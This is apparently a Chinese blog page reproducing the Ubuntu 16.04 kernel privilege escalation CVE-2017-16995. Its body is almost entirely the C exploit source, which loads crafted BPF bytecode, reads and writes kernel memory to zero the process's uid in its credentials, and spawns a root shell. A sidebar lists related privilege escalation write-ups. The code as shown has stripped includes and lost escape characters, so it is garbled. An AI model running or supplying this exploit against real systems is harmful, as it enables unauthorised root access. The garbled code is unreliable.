异域linux内核漏洞,Ubuntu本地提权攻击漏洞复现(CVE-2017-16995)

最新推荐文章于 2023-06-30 11:58:32 发布
最新推荐文章于 2023-06-30 11:58:32 发布
阅读量298 收藏
点赞数
文章标签: 异域linux内核漏洞

/*

* Ubuntu 16.04.4 kernel priv esc

*

* all credits to @bleidl

* - vnik

*/

// Tested on:

// 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64

// if different kernel adjust CRED offset + check kernel stack size

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#define PHYS_OFFSET 0xffff880000000000

#define CRED_OFFSET 0x5f8

#define UID_OFFSET 4

#define LOG_BUF_SIZE 65536

#define PROGSIZE 328

int sockets[2];

int mapfd, progfd;

char *__prog =     "xb4x09x00x00xffxffxffxff"

"x55x09x02x00xffxffxffxff"

"xb7x00x00x00x00x00x00x00"

"x95x00x00x00x00x00x00x00"

"x18x19x00x00x03x00x00x00"

"x00x00x00x00x00x00x00x00"

"xbfx91x00x00x00x00x00x00"

"xbfxa2x00x00x00x00x00x00"

"x07x02x00x00xfcxffxffxff"

"x62x0axfcxffx00x00x00x00"

"x85x00x00x00x01x00x00x00"

"x55x00x01x00x00x00x00x00"

"x95x00x00x00x00x00x00x00"

"x79x06x00x00x00x00x00x00"

"xbfx91x00x00x00x00x00x00"

"xbfxa2x00x00x00x00x00x00"

"x07x02x00x00xfcxffxffxff"

"x62x0axfcxffx01x00x00x00"

"x85x00x00x00x01x00x00x00"

"x55x00x01x00x00x00x00x00"

"x95x00x00x00x00x00x00x00"

"x79x07x00x00x00x00x00x00"

"xbfx91x00x00x00x00x00x00"

"xbfxa2x00x00x00x00x00x00"

"x07x02x00x00xfcxffxffxff"

"x62x0axfcxffx02x00x00x00"

"x85x00x00x00x01x00x00x00"

"x55x00x01x00x00x00x00x00"

"x95x00x00x00x00x00x00x00"

"x79x08x00x00x00x00x00x00"

"xbfx02x00x00x00x00x00x00"

"xb7x00x00x00x00x00x00x00"

"x55x06x03x00x00x00x00x00"

"x79x73x00x00x00x00x00x00"

"x7bx32x00x00x00x00x00x00"

"x95x00x00x00x00x00x00x00"

"x55x06x02x00x01x00x00x00"

"x7bxa2x00x00x00x00x00x00"

"x95x00x00x00x00x00x00x00"

"x7bx87x00x00x00x00x00x00"

"x95x00x00x00x00x00x00x00";

char bpf_log_buf[LOG_BUF_SIZE];

static int bpf_prog_load(enum bpf_prog_type prog_type,

const struct bpf_insn *insns, int prog_len,

const char *license, int kern_version) {

union bpf_attr attr = {

.prog_type = prog_type,

.insns = (__u64)insns,

.insn_cnt = prog_len / sizeof(struct bpf_insn),

.license = (__u64)license,

.log_buf = (__u64)bpf_log_buf,

.log_size = LOG_BUF_SIZE,

.log_level = 1,

};

attr.kern_version = kern_version;

bpf_log_buf[0] = 0;

return syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));

}

static int bpf_create_map(enum bpf_map_type map_type, int key_size, int value_size,

int max_entries) {

union bpf_attr attr = {

.map_type = map_type,

.key_size = key_size,

.value_size = value_size,

.max_entries = max_entries

};

return syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));

}

static int bpf_update_elem(uint64_t key, uint64_t value) {

union bpf_attr attr = {

.map_fd = mapfd,

.key = (__u64)&key,

.value = (__u64)&value,

.flags = 0,

};

return syscall(__NR_bpf, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr));

}

static int bpf_lookup_elem(void *key, void *value) {

union bpf_attr attr = {

.map_fd = mapfd,

.key = (__u64)key,

.value = (__u64)value,

};

return syscall(__NR_bpf, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr));

}

static void __exit(char *err) {

fprintf(stderr, "error: %sn", err);

exit(-1);

}

static void prep(void) {

mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), sizeof(long long), 3);

if (mapfd < 0)

__exit(strerror(errno));

progfd = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER,

(struct bpf_insn *)__prog, PROGSIZE, "GPL", 0);

if (progfd < 0)

__exit(strerror(errno));

if(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets))

__exit(strerror(errno));

if(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0)

__exit(strerror(errno));

}

static void writemsg(void) {

char buffer[64];

ssize_t n = write(sockets[0], buffer, sizeof(buffer));

if (n < 0) {

perror("write");

return;

}

if (n != sizeof(buffer))

fprintf(stderr, "short write: %lun", n);

}

#define __update_elem(a, b, c)

bpf_update_elem(0, (a));

bpf_update_elem(1, (b));

bpf_update_elem(2, (c));

writemsg();

static uint64_t get_value(int key) {

uint64_t value;

if (bpf_lookup_elem(&key, &value))

__exit(strerror(errno));

return value;

}

static uint64_t __get_fp(void) {

__update_elem(1, 0, 0);

return get_value(2);

}

static uint64_t __read(uint64_t addr) {

__update_elem(0, addr, 0);

return get_value(2);

}

static void __write(uint64_t addr, uint64_t val) {

__update_elem(2, addr, val);

}

static uint64_t get_sp(uint64_t addr) {

return addr & ~(0x4000 - 1);

}

static void pwn(void) {

uint64_t fp, sp, task_struct, credptr, uidptr;

fp = __get_fp();

if (fp < PHYS_OFFSET)

__exit("bogus fp");

sp = get_sp(fp);

if (sp < PHYS_OFFSET)

__exit("bogus sp");

task_struct = __read(sp);

if (task_struct < PHYS_OFFSET)

__exit("bogus task ptr");

printf("task_struct = %lxn", task_struct);

credptr = __read(task_struct + CRED_OFFSET); // cred

if (credptr < PHYS_OFFSET)

__exit("bogus cred ptr");

uidptr = credptr + UID_OFFSET; // uid

if (uidptr < PHYS_OFFSET)

__exit("bogus uid ptr");

printf("uidptr = %lxn", uidptr);

__write(uidptr, 0); // set both uid and gid to 0

if (getuid() == 0) {

printf("spawning root shelln");

system("/bin/bash");

exit(0);

}

__exit("not vulnerable?");

}

int main(int argc, char **argv) {

prep();

pwn();

return 0;

}

Sam Qin
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux内核本地提权漏洞(CVE-2019-13272)复现
锋刃科技的博客
09-24 1084
简介 kernel / ptrace.c中的ptrace_link错误地处理了想要创建ptrace关系的进程的凭据记录,这允许本地用户通过利用父子的某些方案来获取root访问权限 进程关系,父进程删除权限并调用execve(可能允许攻击者控制) 影响版本 Linux Kernel < 5.1.17 漏洞复现 poc地址: https://github.com/CrisWang/Exploit-Virtual-Machine/blob/master/Linux/0...
Linux kernel特权提升漏洞复现CVE-2021-3493)
m0_48520508的博客
05-07 694
0x00简介 linux kernel一般指Linux内核Linux是一种开源电脑操作系统内核。它是一个用C语言写成,符合POSIX标准的类Unix操作系统。 0x01漏洞概述 OverlayFS漏洞允许Ubuntu下的本地用户获得root权限。Linux内核中overlayfs文件系统中的Ubuntu特定问题,在该问题中,它未正确验证关于用户名称空间的文件系统功能的应用程序。由于Ubuntu附带了一个允许非特权的overlayfs挂载的补丁,因此本地攻击者可以使用它来获得更高的特权。 0x02影响版本.
Linux提权—脏牛漏洞(CVE-2016-5195)
热门推荐
谢公子的博客
07-25 3万+
目录 脏牛漏洞 exp1复现: exp2复现: 脏牛漏洞 脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞Linux kernel团队在2016年10月18日已经对此进行了修复。 漏洞范围:Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复) 简要分析:该漏洞具体...
LINUX漏洞复现篇之ShellShock漏洞
xf555er的博客
12-06 1005
ShellShock漏洞, 中文称为"破壳漏洞", 是Unix Shell中的安全漏洞在一些网络服务器的部署中, 使用bash来处理某些请求, 允许攻击者通过低版本的bash执行任意Shell命令此漏洞在调用BashShell之前使用payload创建环境变量, 这些环境变量包含Shell代码, 在Shell被调用后代码会被执行bash使用的环境变量是通过函数名称来调用的,以""开头通过环境变量来定义,而在处理这样的恶意的函数环境变量时,并没有以函数结尾 “” 为结束,而是执行其后的恶意shell命令Vul
Linux-dirty pipe内核提权漏洞复现-编号:CVE-2022-0847
╲ゞ紅桃K
08-31 1275
漏洞属于Linux提权漏洞, 攻击者可利用该漏洞使任何非特权(本地)用户在易受攻击的主机上获得root权限,非特权进程可以将代码注入到根进程使得攻击者可获取服务器的所有权限。与该漏洞CVE-2022-0847(Dirty Pipe)类似的另一个漏洞CVE-2016-5195 “Dirty Cow”(脏牛提权),很多人应该了解并且能利用该漏洞。...
CVE-2016-8655 Linux内核提权漏洞POC
11-18
CVE-2016-8655 Linux内核提权漏洞POC
DirtyCow提权漏洞复现CVE-2016-5195)1
08-08
DirtyCow提权漏洞复现CVE-2016-5195)复现(By Jean)目录 1. 环境部署 2 2. 漏洞复现 2 3. 参考 3环境部署主机操作系统
新版脏牛Linux内核提权漏洞CVE-2022-0847
03-09
5.8 <= Linux kernel 中的一个漏洞,它允许覆盖任意只读文件中的数据。这会导致权限提升,因为非特权进程可以将代码注入根进程。 修复版本:Linux 5.16.11、5.15.25 和 5.10.102 中修复。
CVE-2023-21768 Windows AFD 本地提权漏洞 C 源码
最新发布
08-23
CVE-2023-21768 Windows Ancillary Function Driver (AFD) afd.sys本地提权漏洞。 AFD (Ancillary Function Driver)是Windows操作系统中的一个内核模式驱动程序。 漏洞原理: 该漏洞存在于AFD驱动程序处理用户...
CVE-2023-28252 CLFS Windows 本地提权漏洞 POCC 源码
08-23
卡巴斯基披露该在野0day提权漏洞是一个越界写入(增量)漏洞,当目标系统试图扩展元数据块时被利用来获取system权限———Windows中最高的用户权限级别。该漏洞允许改变基础日志文件,迫使系统将基础日志文件中的假...
CVE-2021-4043】Linux本地提权漏洞复现
qq_38162031的博客
04-22 5117
实验步骤 文章目录实验步骤CVE-2021-4043 Linux本地提权漏洞实验背景实验环境漏洞复现构造payload用gcc编译后上传到阿里云执行payload CVE-2021-4043 Linux本地提权漏洞 CNVD-ID CNVD-2022-22323 公开日期 2022-03-24 危害级别 中 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 影响产品 GPAC GPAC <1.1.0 CVE ID CVE-2021-4043 漏洞描述 GPAC是
脏牛Linux本地提权漏洞复现CVE2016-5195)
Ping_Pig的博客
10-24 2415
漏洞介绍: 脏牛漏洞CVE2016-5195)是公开后影响范围最广和最深的漏洞之一,到2016被修复只十年来的每一个linux版本包括Android,桌面版和服务器版都受其影响。恶意攻击者可以轻易绕过常用的漏洞防御方法,对几百万用户进行攻击。国外安全公司Bindecy对该补丁和内容做出深入研究后发现补丁任然存在缺陷,由此还衍生出了“大脏牛”漏洞 漏洞范围: Linux kernel &gt...
CVE-2022-0847Linux内核提权漏洞复现
xhwfa的博客
03-16 5416
一、漏洞详情 3月7日,研究人员公开披露了Linux内核中的一个权限提升漏洞CVE-2022-0847,也称为"Dirty Pipe"),允许非特权用户注入和覆盖任意只读文件中的数据,导致权限提升,并最终获得root权限。该漏洞影响了Linux Kernel 5.8及更高版本,甚至影响了Android设备。 CVE-2022-0847漏洞类似于 2016 年修复的Dirty COW漏洞,即脏牛漏洞 (CVE-2016-5195),但它更容易被利用,目前此漏洞的POC/EXP已经发布。 二、漏洞影响版
基于BT5R3-Metasploit完成Linux Metasploit靶机中的Samba服务漏洞复现
F14735971227的博客
01-20 684
back track5R3对Linux Metasploit中的samba服务漏洞的利用
CVE-2021-3493 Ubuntu Overlayfs补丁导致的内核提权漏洞复现
m0_56642842的博客
07-13 462
0x00 简介 OverlayFS是一个面向Linux的文件系统服务,是一种类似aufs的一种堆叠文件系统,它依赖并建立在其它的文件系统上(如ext4fs和xfs等),并不直接参与磁盘空间结构的划分,仅仅将原来底层文件系统中不同的目录进行合并,然后向用户呈现,因此对于用户来说,它所见到的overlay文件系统根目录下的内容就来自挂载时所指定的不同目录的合集。 0x01 漏洞概述 CVE-2021-3493漏洞Linux内核中overlayfs文件系统中的Ubuntu特定问题,在Ubuntu中没有正确验证
作为linux系统,同样存在很多漏洞
qifutao0301的专栏
11-15 534
作为一个系统管理员来说,定期对系统作一次全面的安全检查很重要的,最近遇到一些朋友来信说出现了一些莫名其妙的问题,例如最大的一个问题就是明显感觉网络服务缓慢,这极有可能是被攻击的现象。实践证明,无论是那种系统,默认安装都是不安全的,实际不管你用windows也好,linux,bsd或其他什么系统,默认安装的都有很多漏洞,那怎么才能成为安全的系统呢,这正是我们系统管理人员需要做的事情。配置配置再配置。
Linux常见漏洞修复教程!
高性价比服务器就选:蓝易云
06-30 973
请注意,漏洞修复的具体方法和措施取决于特定的漏洞和系统配置。建议您根据具体情况进行进一步研究和采取相应的安全措施。如果不确定如何修复特定漏洞,请参考相关厂商的安全公告和文档,或者咨询安全专家。修复Linux系统中的常见漏洞是确保系统安全性的重要步骤。
linux sudo root 权限绕过漏洞(CVE-2019-14287)
Sylon的博客
10-15 3638
0x01 逛圈子社区论坛 看到了 linux sudo root 权限绕过漏洞(CVE-2019-14287) 跟着复现下 综合来说 这个漏洞作用不大 需要以下几个前提条件 1.知道当前普通用户的密码 2.当前普通用户在souduers文件中 3.本地提权需要本地操作 估计远程ssh连接的终端会失败 0x02 此漏洞可以使受限制的用户运行root命令 1.8.28之前的...
Linux kernel 本地权限提升漏洞
weixin_30437847的博客
02-27 83
漏洞名称: Linux kernel 本地权限提升漏洞 CNNVD编号: CNNVD-201302-576 发布时间: 2013-02-27 更新时间: 2013-02-27 危害等级: 漏洞类型: 权限许可和访问控制 威胁类型: 本地 CVE编号: CVE-2013-1...
sudo apt-get install -y linux-modules-extra-$(uname -r) Reading package lists... Done Building dependency tree Reading state information... Done E: Unable to locate package linux-modules-extra-4.4.0-142-generic E: Couldn't find any package by regex 'linux-modules-extra-4.4.0-142-generic'
06-08
这个错误信息表明你当前的内核版本是 4.4.0-142-generic,但是系统没有找到与之对应的 linux-modules-extra 包。这可能是因为该版本的内核不再维护,或者你的源列表中没有包含该版本的软件包。 你可以尝试使用以下命令更新源列表并重新安装 linux-modules-extra: ``` $ sudo apt-get update $ sudo apt-get install linux-modules-extra-4.4.0-142-generic ``` 如果上述命令仍然无法安装 linux-modules-extra 包,请尝试升级你的内核版本,并在新的内核版本中安装 linux-modules-extra 包。你可以使用以下命令升级内核: ``` $ sudo apt-get update $ sudo apt-get install linux-generic-lts-xenial ``` 安装完成后,重新启动系统,进入新的内核版本中,然后再执行安装 linux-modules-extra 包的命令。 ``` $ sudo apt-get update $ sudo apt-get install linux-modules-extra-$(uname -r) ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值